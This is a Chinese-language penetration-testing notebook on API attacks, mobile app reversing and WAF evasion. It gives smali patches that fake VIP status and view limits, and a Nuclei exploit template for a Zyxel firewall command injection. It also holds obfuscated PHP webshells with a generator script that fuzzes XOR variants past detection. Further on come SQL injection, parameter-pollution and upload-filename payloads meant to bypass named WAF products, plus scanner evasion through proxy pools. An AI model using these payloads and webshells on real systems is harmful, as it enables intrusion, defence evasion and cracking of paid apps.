app，waf笔记

API攻防

知识点：

1、HTTP接口类-测评

2、RPC类接口-测评

3、Web Service类-测评

内容点：

SOAP（Simple Object Access Protocol）简单对象访问协议是交换数据的一种协议规范，是一种轻量级的、简单的、基于XML（标准通用标记语言下的一个子集）的协议，它被设计成在WEB上交换结构化的和固化的信息。SOAP部署Web Service的专有协议。SOAP使用HTTP来发送XML格式的数据，可以简单理解为：SOAP=HTTP+XML

REST（Representation State Teansfer）即表述性状态传递，在三种主流的Web服务实现方案中，因为REST模式的Web服务与复杂的SOAP和XML-RPC对比来讲明显的更加简洁，越来越多的web服务开始采用REST风格设计和实现。例如，Amazon.com提供接近REST风格的Web服务进行图书查找，雅虎提供的Web服务也是REST风格的。

WSDL（Web Services Description Language）即网络服务描述语言，用于描述Web服务的公共接口。这是一个基于XML的关于如何与Web服务通讯和使用的服务描述；也就是描述与目录中列出的Web服务进行交互时需要绑定的协议和信息格式。通常采用抽象语言描述该服务支持的查找和信息，使用的时候再将实际的网络协议和信息格式绑定给该服务。

接口数据包：

Method:请求方法

攻击方式：OPTIONS,PUT,MOVE,DELETE

效果：上传恶意文件，修改页面等

URL：位移资源定位符

攻击方式：猜测，遍历，跳转

效果：未授权访问等

Params：请求参数

攻击方式：构造参数，修改参数，遍历，重发

效果：爆破，越权，未授权访问，突破业务逻辑等

Authorization：认证方式

攻击方式：身份伪造，身份篡改

效果：越权，未授权访问等

Headers：请求消息头

攻击方式：拦截数据包，改Hosts，改Referer，改Content-Type等

效果：绕过身份认证，绕过Referer验证，绕过类型验证，DDOS等

Body：消息体

攻击方式：SQL注入，XML注入，反序列化等

效果：提权，突破业务逻辑，未授权访问等

安全问题：

XSS跨站，信息泄露，暴力破解，文件上传，未授权访问，JWT授权认证，接口滥用等

WebService类-Wsdl&SoapUI

探针：?wsdl

利用：SoapUI&ReadyAPI

SOAP类-Swagger&SoapUI&EXP

探针：目录&JS资源

利用：SoapUI&EXP

https://github.com/lijiejie/swagger-exp

https://github.com/jayus0821/swagger-hack

目录：

/swagger

/api/swagger

/swagger/ui

/api/swagger/ui

/swagger-ui.html

/api/swagger-ui.html

/user/swagger-ui.html

/libs/swaggerui

/api/swaggerui

/swagger-resources/configuration/ui

/swagger-resources/configuration/security

HTTP类-Webpack&PackerFuzzer

探针：插件&JS资源

利用：PackerFuzzer

https://github.com/rtcatc/Packer-Fuzzer

Postman自动化测试

https://www.postman.com/downloads/

Dvws泄露&鉴权&XXE

https://github.com/snoopysecurity/dvws-node

Aliyun-accesskey-tools-main

APP攻防

知识点：

a:资产提权-AppinfoScanner

b:评估框架-MobSF&mobexler

c:抓包利器-Frida&r0caprure

章节点：

1、信息搜集-应用&资产提取&权限等

2、漏洞发现-反编译&脱壳&代码审计

3、安全评估-组件&敏感密匙&恶意分析

核心点：

A:内在点-资产提取&版本&信息等

B:抓包点-反代理&反证书&协议等

C:逆向点-反编译&脱壳&重打包等

D:安全点-资产&接口&漏洞&审计等

内在-资产提取-AppinfoScanner

AppinfoScanner一款适用于以HW行动/红队/渗透测试团队为场景的移动端（Android、iOS、WEB、H5、静态网站）信息搜集扫描工具，可以帮助渗透测试工程师、攻击队成员、红队成员快速搜集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出。如：Titile、Domain、CDN、指纹信息、状态信息等。

https://github.com/kelvinBen/AppInfoScanner

内在-安全评估-MobSF&mobexler

移动安全框架（MobSF）是一种自动化的一体化移动应用程序（Android/iOS/Windows）渗透测试、恶意软件分析和安全评估框架，能够执行静态和动态分析。MobSF支持移动应用程序二进制文件（APK、XAPK、IPA和APPX）以及压缩源代码，并提供REST API以与您的CI/CD或DevSecOps管道无缝集成，动态分析器可帮助您执行运行时安全评估和交互式仪器测试。

Mobexler是基于Elementary OS的定制虚拟机，旨在帮助进行Android和iOS应用程序的渗透测试。Mobexler预装了各种开宇工具，脚本，黑客必备软件等，这些都是安全测试Android和iOS应用程序所必须的。

https://mobexler.com/

https://github.com/MobSF/Mobile-Security-Framework-MobSF

docker pull opensecurity/mobile-security-framework-mobsf

docker run -it -p 8008:8000 opensecurity/mobile-security-framework-mobsf:latest

外在-证书抓包- frida-server&r0capture

r0capture仅限安卓平台，测试安卓7、8、9、10、11可用

无视所有证书校验或绑定不用考虑任何证书的事情

通杀TCP/IP四层模型中的应用层中的全部协议

同时协议包括：Http，WebSocket，Ftp，Xmpp，lmap，Smtp，Protobuf等、及他们的SSL版本；

通杀所有应用层框架，包括HttpUrlConnection、Okhttp1/3/4、Retrofit/Volley等等；

无视加固，不管是整体壳还是二代壳或VMP，不用考虑加固的事情；

Firda是一款易用的跨平Hook工具，Java层到Native层的Hook无所不能，是一种动态的插桩工具，可以插入代码到原生App的内存空间中，动态的去监视和修改行为，原生平台包括Win，Mac，Linux、Android、iOS全平台

测试环境：

Windows10 Python3.7 夜神模拟器 r0capture frida-server wireshark

https://github.com/r0ysue/r0capture

https://github.com/frida/frida/releases

1、本地安装Frida

pip install frida

pip install frida-tools

2、模拟器安装Frida

注意：版本要和本地Frida一致

下载：https://github.com/frida/frida/releases

真机：ARM版本及位数 模拟器：无ARM的位数

getprop ro.product.cpu.abi

adb push frida-server /data/local

cd /data/local/tmp/

chmod 777 frida-server

./frida-server

ps | grep frida

3、转发并启动Frida

adb forward tcp:xxxx tcp:xxxx

连接判断：frida-ps -U frida-ps -R

4、获取包名并运行抓包

获取包名：ls /data/data 或Apk Messager

python r0capture.py -U -f 包名 -p xxxx.pacp

知识点：

1）APP防代理绕过-应用&转发

2）APP证书校验类型-单项&双向

3）APP证书校验绕过-Frida&XP框架等

章节点：

1】信息收集-应用&资产提取&权限等

2】漏洞发现-反编译&脱壳&代码审计

3】安全评估-组件&敏感密匙&恶意分析

核心点：

0、内在点-资产提取&版本&信息等

1、抓包点-反代理&反证书&协议等

2、逆向点-反编译&脱壳&重打包等

3、安全点-资产&接口&漏洞&审计等

        

反代理绕过：

https://zone.huoxian.cn/d/440-app

1.自身的抓包应用

2.Proxifier转发使用

证书校验绕过：

情况一：客户端不存在证书校验，服务器也不存在证书校验

情况二：客户端存在校验服务端证书，服务器不存在证书校验，单项校验

情况三：客户端存在证书校验，服务器也存在证书校验，双向校验。

1、frida&r0capture底层        可绕过双向

2、Xposed&JustTrust&HOOK        只能绕过单向

3、反编译逆向提取证书重编打包

A:单纯开上模拟器的代理后打不开，没有出现数据包的情况        反代理

B:用到proxifier转发后也打不开，带上出现了数据包的情况        反证书

反编译&打包

反编译加固-自动查壳脱壳

https://github.com/CodingGay/BlackDex

查壳：ApkScan-PKID

脱壳：BlackDex

功能修改-反编译&次数&会员

次数：

逻辑：修改手机型号

.method public getRe_today_view_times()Ljava/lang/String;

.locals 1

.line 307

iget-object v0,p0,Lcom/ufozfnxzqm/dvbphwfo/entity/UserInfo;->re_today_view_times:Ljava/lang/String;I

const-string v0,"999999"

return-object v0

.end method

会员：

.method public getIs_vip()

.locals 1

.line 347

iget v0,p0,Lcom/ufozfnxzqm/dvbphwfo/entity/UserInfo;->is_vip;l

const/4 v0,0x1

return v0

.end method

功能修改-反编译&图标&信息

打包编译-证书签名&修改信息

安卓修改大师-替换图标&修改信息

安卓修改大师-证书自带&重打包选择

微信小程序

0、apk信息资源提取

1、微信小程序-数据抓包

2、微信小程序-解包反编译

app&apk-信息资源文件提取

APK Messenger-基本信息&资源文件&开启权限等

微信小程序-真机&模拟器数据抓包

安卓系统抓包（微信小程序）：

1、安卓系统7.0以下版本，不管微信任意版本，都会信任系统提供的证书

2、安卓系统7.0以上版本，微信7.0以下版本，微信会信任系统提供的证书

3、安卓系统7.0以上版本，微信7.0以上版本，微信只信任他自己配置的证书列表

基于上述我们解决的方式如下：

1、将证书安装到系统证书中（需要root）

2、苹果手机（苹果手机不受此影响）

3、采用安卓系统低于7.0的模拟器

4、使用低版本电脑版微信抓包

演示：逍遥模拟器5.1安卓系统微信小程序抓包

演示：夜神模拟器多开5安卓系统微信小程序抓包

演示：真机IPhone-IOS系统微信小程序抓包

条件：抓包本机需要和IPhone手机处于同一WIFI下

iphone配置wifi的代理，代理设置地址写本地抓包工具地址和端口

微信小程序-PC&模拟器分包反编译

1、富哥

欢迎使用多功能小程序助手工具，点击确定开始使用

免责声明：不得将小程序反编译源码程序和反编译图片素材挪用商业或盈利使用

使用教程地：https://www.kancloud.cn/ludeqi/xcxzs/2607637

新版下载地址：https://xcx.siqingw.top/xcx.zip

2、穷哥们：

https://github.com/sanriqing/WxAppUnpacker

安装node.js

https://nodejs.cn/download/

安装依赖：

npm install

模拟器取出wxapkg文件：

/data/data/com.tencent.mm/MicroMsg/xxxxxx/appbrand/pkg

反编译解包

node wuWxapkg.js -s=../xxx.wxapkg

安全点：

1、渗透角度：测试的app提供服务的服务器，网站，接口等，一旦这个有安全问题，被不法分子利用，相当于App正常服务就会收到直接影响

APK-白盒-Java代码审计

APK-黑盒-资产&Web&IP&接口等

小程序-白盒-Node.js代码审计

小程序-黑盒-资产&Web&IP&接口等

2、开发角度：测试的app里代码的设计安全，采用没加密的发送数据，采用权限过高的设置导致攻击者利用app获取到手机的敏感信息等

弱加密，逻辑安全，授权，中间人等     

流程：

A:信息收集

抓包-APP里面涉及的资产

反编译提取-APP里面涉及的资产

B:资产-信息收集

web应用

cms 中间件 框架 服务器IP 端口等

webpack         webpackfuzz打包分析

web漏洞扫描        awvs进行简单探针

安全测试报告：

1、Spring Boot Actuator v2未授权访问

2、Spring Boot RCE

3、HeapDump-信息泄露-账号密码等

select s from  java.lang.String s

        where /pass/.test(s.value.toString())

HeapDump分析：

JVisualVM MAT heapdump_tool等

JVisualVM：jdk自带

MAT：https://www.eclipse.org/mat/downloads.php

heapdump_tool:https://github.com/wyzxxz/heapdump_tool

Actuator未授权检测：

https://github.com/rabbitmask/SB-Actuator

Springboot漏洞检测：

https://github.com/LandGrey/SpringBootVulExploit

OSS_AccessKey利用：

https://github.com/mrknow001/aliyun-accesskey-Tools   

漏洞发现                         

Web框架中间件

1、Burp 简单介绍&使用说明

2、Xray 简单介绍&使用说明

3、Awvs 简单介绍&使用说明

4、Goby  简单介绍&使用说明

5、Afrog  简单介绍&使用说明

6、Vulmap  简单介绍&使用说明

7、Pocassist  简单介绍&使用说明

8、掌握工具安装使用&原理&联动&适用

市面上有很多漏扫系统工具脚本，课程讲到的基本都是目前主流推荐的优秀项目

具体项目：Burpsuite，Awvs，Xray，Goby，Afrog，Vulmap，Pocassist，Nessus，Nuclei，Pentestkit，Kunyu，BP插件（HaE，ShiroScan，FastJsonScan，Log4j2Scan等）等。

章节点：

1、漏洞发现-web&框架层面

2、漏洞发现-服务&中间件层面

3、漏洞发现-APP&小程序层面

4、漏洞发现-PC操作系统层面

Acunetix一款商业的Web漏洞扫描程序，它可以检查Web应用程序中的漏洞，如SQL注入、跨站脚本攻击、身份验证页上的弱口令长度等。它拥有一个操作方便的图形用户界面，而且能够创建专业级的Web站点安全审核报告。新版本集成了漏洞管理功能来扩展企业全面管理、优先级和控制漏洞威胁的能力

。。。

https://www.ddosi.org/awvs14-6-log4j-rce/

https://github.com/chatin/xray/releases

https://github.com/zan8in/afrog/releases

https://github.com/zhzyker/vulmap/releases

https://github.com/jweny/pocassist/releases

https://github.com/gobysec/Goby/releases

其他特扫

1、GUI_TOOLS_v6.1_by安全圈小王子-bugfixed

2、CMS漏洞扫描器名称 支持的CMS平台

Droopescan WordPress，Joomla，Drupal，Moodle，SilverStripe，CMSmap WordPress，CMSeek WordPress，WPXF wordpress，WPScan WordPress，WPSeku WordPress，WPForce WordPress，JoomlaVSJoomla，JScanner Joomla，Drupwn Drupal，Typo3Scan Typo3

致远OA综合利用工具        https://github.com/Summer177/seeyon_exp seeyon_exp

通达OA综合利用工具        https://github.com/xinyu2428/TDOA_RCE TDOA_RCE

蓝凌OA漏洞利用工具/前台无条件RCE/文件写入

https://github.com/yuanhaiGreg/LandrayExploit LandrayExploit

泛微OA漏洞综合利用脚本 https://github.com/z1un/weaver_exp weaver_exp

锐捷网络EG网关RCE批量安全检测      https://github.com/Ras9er/EgGateWayGetShellEgGateWayGetshell

CMSmap针对流行CMS进行安全扫描的工具 https://github.com/Dionach/CMSmap

使用Go开发的WordPress扫洞工具 https://github.com/blackbinn/wprecon

一个Ruby框架，旨在帮助对wordpress系统进行渗透测试

https://github.com/rastating/wordpress-exploit-framework

WPScan WordPress安全扫描器        https://github.com/wpscantea,/wpscan

WPForce WordPress攻击套件        https://github.com/n00py/WPForce

某APP-web扫描-常规&联动-Burp&Awvs&Xray

对比工具优缺点

对比工具使用方法

Awvs：

任务添加&数据头&代理模式&扫描模式等

example：http://demo.aisec.cn/

Xray:

主动扫描&被动扫描&POC资源等

.\xray_windows_amd64.exe webscan --basic-crawler http://xx/ --html-output tomcat.html

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output app.html

URL单点扫描&数据包扫描

1、相互联动性解决漏扫

2、相互联动性解决URL未探针

手工触发URL数据包&扫描器爬虫规则探针

Burp&Xray联动

1、Burp设置代理转发

2、Xray设置被动扫描

Awvs&Xray联动

1、Awvs设置代理扫描

2、Xray设置被动扫描

Awvs&Burp&Xray联动

1、Awvs设置代理扫描

2、Burp设置转发代理

3、Xray设置被动扫描

Vulfocus-框架扫描-特定&核心-Goby&vulmap&Afrog&Pocassist

案例：配合vulfocus进行某服务或中间件的安全检查评估

某资产特征-联动扫描-综合&调用-Goby&Awvs&Xray&Vulmap

案例：配合Goby&Fofa插件进行某中间件的安全检查评估

1、下载拓展插件

2、设置配置插件

3、扫描调用插件

操作系统漏洞扫描

案例1-Nessus&Nexpose漏扫操作系统漏洞

案例2-Goby&Nuclei漏扫系统&服务&中间件漏洞

Nuclei -u http://xxx

案例3-Nuclei漏扫特定资产&模板导入&最新漏洞

例子：CVE-2022-30525：Zyxel防火墙远程命令注入漏洞

FofaViewer：title=="USG FlEX 50 (USG20-VPN)"

nuclei exe -t Zyxel.yaml -l z.txt

Zyxel.yaml;

id:CVE-2022-30525

info:

 name:cx

 author:remote

 severity:high

 tags:CVE-2022-30525

 reference:CVE-2022-30525

requests

 -raw

        -I

         POST /zip/cgi-bin/handler HTTP/1 1

         Host {{Hostname}}

         Content-Type:application/json;charset=utf-8

        {"command":"setWanPortSt","proto":"dhcp","port":"1270","vlan_tagged":"1270","vlanid":"1270","mtu":"{{exploit}}","data":""}

 payloads:

        exploit:

        -",ping -c 3 {{interactsh-url}};"

        attack:pitchfork

        matchers:

        -type:word

         part:interactsh_protocol

        name:dns

        words:

        -"dns"

案例4-FofaMap&Nuclei漏扫自动化特定资产漏洞

Burp插件，以及其他工具

漏洞利用

知识点：

1、MSF-漏洞利用框架使用

2、库查找-CVE&CNVD&关键字

3、库整理-CVE&CNVD漏洞详情

4、新漏洞-框架或其他未集成利用

集成和未集成漏洞的利用思路，漏洞利用条件等

漏洞资源：

today-cve

https://cassandra.cerias.purdue.edu/CVE_changes/today.html

cve官网

https://cve.mitre.org/

国家信息安全漏洞共享平台

https://www.cnvd.org.cn/

国家信息安全漏洞库

http://www.cnnvd.org.cn/       

漏洞利用-整理库-PocOrExp&CVE-CNVD

https://github.com/ttonys/Scrapy-CVE-CNVD

https://github.com/ycdxsb/PocOrExp_in_Github

漏洞利用-查找库-SearchSploit&PoC-in-GitHub

https://github.com/nomi-sec/PoC-in-GitHub

https://github.com/offensive-security/exploitdb

漏洞利用-模块框架-MetaSploit-Framework（MSF）

https://www.metasploit.com/

安装下载：https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

简单使用：

https://blog.csdn.net/weixin_42380348/article/details/123549631

漏洞利用-杂乱工具-特定图像化渗透武器库（v6.1）

Waf攻防

知识点：

1、WAF介绍&模式&识别&防护等

2、信息收集-被动扫描&第三方接口

3、信息收集-基于爬虫&文件目录探针

4、信息收集-基于用户&代理池&白名单

章节点：

WAF绕过主要集中在信息收集，漏洞发现，漏洞利用，权限控制四个阶段。

补充点：

1、什么是WAF？

Web Application Firewall（web应用防火墙），一种公认的说法是“web应用防火墙通过执行一系列针对HTTP/HTTPS的安全策略来专门为web应用提供保护的一款产品。”

基本可以分为以下四种：

软件型WAF

以软件的形式安装在服务器上面，可以接触到服务器上的文件，因此就可以检测服务器上是否有webshell，是否有文件被创建等。

硬件型WAF

以硬件形式部署在链路中，支持多种部署方式。当串联到链路上时可以拦截恶意流量，在旁路监听模式时只记录攻击但是不进行拦截

云WAF

一般以反向代理的形式工作，通过配置后，使对网站的请求数据优先经过WAF主机，在WAF主机对数据进行过滤后再传给服务器

网站内置的WAF

就是来自网站内部的过滤，直接出现在网站代码中，比如说对输入的参数强制类型转换，对输入的参数进行敏感词检测

2、如何判断WAF？

Wafw00f，看图识别，其他项目脚本平台

https://mp.weixin.qq.com/s/3uUZKryCufQ_HcuMc8ZgQQ

3、常见WAF拓扑&防护

流量走向&常见漏洞

4、目前有哪些常见WAF产品

参考：https://blog.csdn.net/w2sft/article/details/104533082/

1）硬件型

硬件型WAF以一个独立的硬件设备的形态存在，支持多种方式（如透明桥接模式、旁路模式、反向代理等）部署到网络中为后端的Web应用提供安全防护，是最为传统的WAF形态，在受访企业中部署占比为35.2%。相比于软件产品类的WAF，这类产品的优点是性能好、功能全面、支持多种模式部署等，但它的价格通常比较贵。国内的绿盟，安恒，启明星辰等老牌厂商旗下的WAF都属于此类。

2）软件型

这种类型的WAF采用纯软件的方式实现，特点是安装简单，容易使用，成本低。但它的确定也是显而易见的，除了性能收到限制外，还可能会存在兼容性，安全等问题。这类WAF的代表有ModSecurity、Naxsi、ShareWAF、安全狗等。

3）云WAF

随着云计算技术的快速发展，使得基于云的WAF实现成为可能，在本次调查中占比甚至超过了传统的硬件WAF跃升为第一位，达到39.4%。阿里云、腾讯云、深信服云WAF、Imperva WAF这类WAF的典型代表

信息收集常见检测：

1、脚本或工具速度流量快

2、脚本或工具的指纹被识别

3、脚本或工具的检测Payload

信息搜集常见方法：

1、延迟：解决请求过快封IP情况

2、代理池：在确保速度的情况下解决请求过快封IP的拦截

3、白名单：模拟白名单模拟WAF授权测试，解决速度及测试拦截

4、模拟用户：模拟真实用户数据包请求探针，解决WAF指纹识别

信息搜集-被动扫描-黑暗引擎&第三方接口

黑暗引擎：Fofa Quake Shodan Zoomeye 0.zone等

其他接口：https://forum.ywhack.com/bountytips.php?getinfo

信息收集-目录扫描-Python代理加载脚本

import requests

import time

headers={

'Connection':'keep-alive',

'Cache-Control':'max-age=0',

'Upgrade-Insecure-Requests':'1',

'User-Agent':'Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/89.0.4389.114 Safari/537.36',

'Sec-Fetch-Dest':'document',

'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*,q=0.8,application/signed-exchange;v=b3;q=0.9',

'Sec-Fetch-Site':'none',

'Sec-Fetch-Node':'navigete',

'Sec-Fetch-User':'?1',

'Accept-Language':'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',

'Cookie':'bdshare firstime=1581597934650;PHPSESSION=ncsajdvh39g'

}

for paths in open('php_b.txt',encoding='utf-8'):        #字典位置

        url='http://www.xx.com/'

        paths=paths.replace('\n','')

        urls=url+paths

        proxy={

                'http':'xxx.xxx.com:xxxx',#代理服务器

}

try:

        code=requests.get(urls,headers=headers,proxies=proxy).status_code

#req=requests.get(urls,headers=headers,proxies=proxy)

#print(urls)

#print(req.text)

#time.sleep()

print(urls+'|'+str(code))

if code==200 or code==403:

        print(urls+'|'+str(code))

except Exception as err:

        print('connectiong error')

        time.sleep(3)

知识点：

1、脚本后门基础&原理

2、脚本后门查杀绕过机制

3、权限维持-覆盖&传参&加密&异或等

代码块&传参数据&工具指纹等（表面&行为）

1、代码表面层免杀-ASP&PHP&JSP&ASPX等

2、工具行为层免杀-菜刀&蚂剑&冰蝎&哥斯拉等

基础-脚本后门控制原理-代码解释

对比工具代码-菜刀&蚁剑&冰蝎&哥斯拉等

原理-脚本后门查杀机制-函数&行为

对比WAF规则-函数匹配&工具指纹等

代码-脚本后门免杀变异-覆盖&传参

1、php传参带入

<?php

$a=$_GET['a'];

$aa=$a.'ert';

$aa(base64_decode($_POST['x']));

?>

?a=ass

x=cGhwaW5mbygpOw==

2、php 变量覆盖

<?php

$a='b';

$b='assert';

$$a(base64_decode($_POST['x']));

?>

3、php 加密变异

http://www.phpjm.net/

https://www.phpjms.com/

http://1.15.155.76:1234/

4、php异或运算

import requests

import time

import threading.queue

def string():

        while not q.empty():

                filename=q.get()

                url='http://127.0.0.1:8081/x/'+filename

                datas={

                'x':'phpinfo();'

}

result=requests.post(url,data=datas).content.decode('utf-8')

if 'XIAODI-PC' in result:

        print('check->'+filename+'->ok')

else

        print('check->'+filename+'->no')

time.sleep(1)

def shell_test_check()

        url='http://127.0.0.1:8081/x/33xd64.php'

        datas={

        'x':'phpinfo();'

}

result=requests.post(url,data=datas)content.decode('utf-8')

print(result)

if 'XIAODI-PC' in result

        print('ok')

if __name__=='__main__'

        q=queue.Queue()

        for i in range(1,127):

                for ii in range(1,127):

                        payload="'"+chr(i)+"'"+"'"+chr(ii)+"'"

                        code="<?php $a=("+payload+").'ssert';$a($_POST['x']);?>"

                         filename = str(i)+'xd'+str(ii)+'.php'

                         q.put(filename)

                        with open('D:/phpstudy/PHPTutorial/WWW/x/'+filename.'a') as f:

                                f.write(code)

                                f.close() 

                                print('Fuzz文件生成成功')

                        for x in range(20):

                                t=threading Thread(target=string)

                                t.start()

php混淆加密

blog.csdn.net/qq_41617034/article/details/104441032

<?php

$fuhao="!@#$%^&*()_+=<>?:,.{}[]\|/";

$zimu="QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm";

$strlen_fuhao=strlen($fuhao);

$strlen_zimu=strlen($zimu);

for($i=0;$i<$strlen_fuhao;$i++){

        for($j=0;$j<$strlen_zimu;$j++){

        echo $fuhao[$i]."^".$zimu[$j]."-->".("$fuhao[$i]"^"$zimu[$j]");

        echo "<br>";

}

}

        

?>

拓展-脚本后门脚本类型-JSP&ASPX

5、php脚本生成器

Webshell-venom

ASP PHP JSP ASPX

菜刀-流量&绕过&检测

1、版本

2014 $_POST=$_REQUEST 2016可以

2、特征

数据包流量特征：

1、请求包中：ua头为百度爬虫

2、请求体中存在eval，base64等特征字符

3、请求体中传递的payload为base64编码，并且存在固定的语句

冰蝎-流量&绕过&特征&检测

1、介绍

冰蝎利用了服务器端的脚本语言加密功能，通讯的过程中

消息体内采用AES加密，基于特征值检测的安全产品无法查出

2、通讯

以代码Key为密钥的AES加密解密功能

3、特征

1）User-agent:代码中定义

2）Pragma:no-cache

3）Content-Type:application/x-www-form-urlencoded

4）Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

5）Accept-Encoding:gzip,deflate,br

6）Accept-Language:zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7

哥斯拉-流量&绕过&特征&检测

1、通讯加密

2、特征：

1）User-Agent:mozilla/5.0(Windows NT 10.0;Win64;x64;rv:84.0)Gecko/20100101 Firefox/84.0

2）Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

3）Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

4）Cookie:PHPSESSION=rut2a51prso470jvfe2q502o44; cookie最后面存在一个";"

知识点：

1、Http/s&Sock5协议

2、Awvs&Xray&Goby代理

3、Proxifier进程代理利用

4、Safedog&BT&Aliyun防护

在漏洞发现中，WAF会对三个方向进行过滤拦截

1、流量速度问题

2、工具的指纹被扫描

3、工具的检测POC或Payload

Awvs漏扫-safedog-白名单-内置

加入白名单扫描，防safedog拉黑ip

awvs漏扫-BT&Aliyun-代理池-内置

加入代理池扫描。防BT或Aliyun拉黑IP

Xray漏扫-BT&Aliyun-Proxifier-进程

加入代理吃扫描，防BT或Aliyun拉黑IP

知识点：

1、SQL注入&文件上传绕过

2、XSS跨站&其他漏洞绕过

3、HPP污染&垃圾数据&分块等

参考点：

将MySQL注入函数分为几类

拆分字符串函数：mid，left，lpad等

编码函数：ord、hex、ascii等

运算函数：+ - * / & ^ ! like rlike reg 等

空格替换部分：09、0a、0b、0c、0d等

关键数据函数：user()、version()、database()等

然后将这些不同类型的函数组合拼接在一起

上传参数名解析：明确哪些东西能修改？

Content-Disposition:一般可以修改

name:表单参数值，不能修改

filename:文件名，可以修改

Content-Type:文件MIME，视情况更改

XSS跨站

利用XSStrike绕过 加上--timeout或--proxy配合代理池绕过cc&Fuzz

其他集合

RCE：

加密加码绕过？算法可逆？关键字绕过？提交方法？各种测试！

txt=$y=str_replace('x','','pxhpxinxfo()');assert($y);&submit=%E6%8F%90%E4%BA%A4

文件包含：

..\        ..../        ..\.\等

安全狗-SQL注入&文件上传

SQL注入 https://www.cnblogs.com/cute-puli/p/11146625.html

关键字替换

http://192.168.0.100:8081/sqlilabs/Less-2/?id=1 like 1

http://192.168.0.100:8081/sqlilabs/Less-2/?id=1 like 12

更换提交方式：

POST id = -1 union select 1,2,3--+

模拟文件上传 传递数据

分块传输：更改数据请求格式

https://github.com/c0ny1/chunked-coding-converter

HPP参数污染：id=1/**&id=-1%20union%20select%201,2,3%23*/

文件上传：换行解析&垃圾溢出&%00干扰&=符号干扰&参数模拟

filename=a.php

filename="a.php

filename="a.php%00"

垃圾数据;filename="a.php"

无限filename;filename="a.php"

filename=="a.php"

filename="name="uploadfile.php"

filename="Content-Disposition:form-data.php"

filename=="a.ph

p"

安全狗-文件包含&代码执行-知识点

BT&Aliyun-SQL注入&文件上传

python sqlmap.py -u

"http://xxx?name=*&submit=%E6%9F%A5%E8%AF%A2" --random-agent --tamper=rdog.py --proxy="http://xxx（代理服务器）"

格式替换

BT&Aliyun-文件包含&代码执行

https://github.com/s0md3v/XSStrike

python xsstrike.py -u "http://xx?mesage=1&submit=submit" --proxy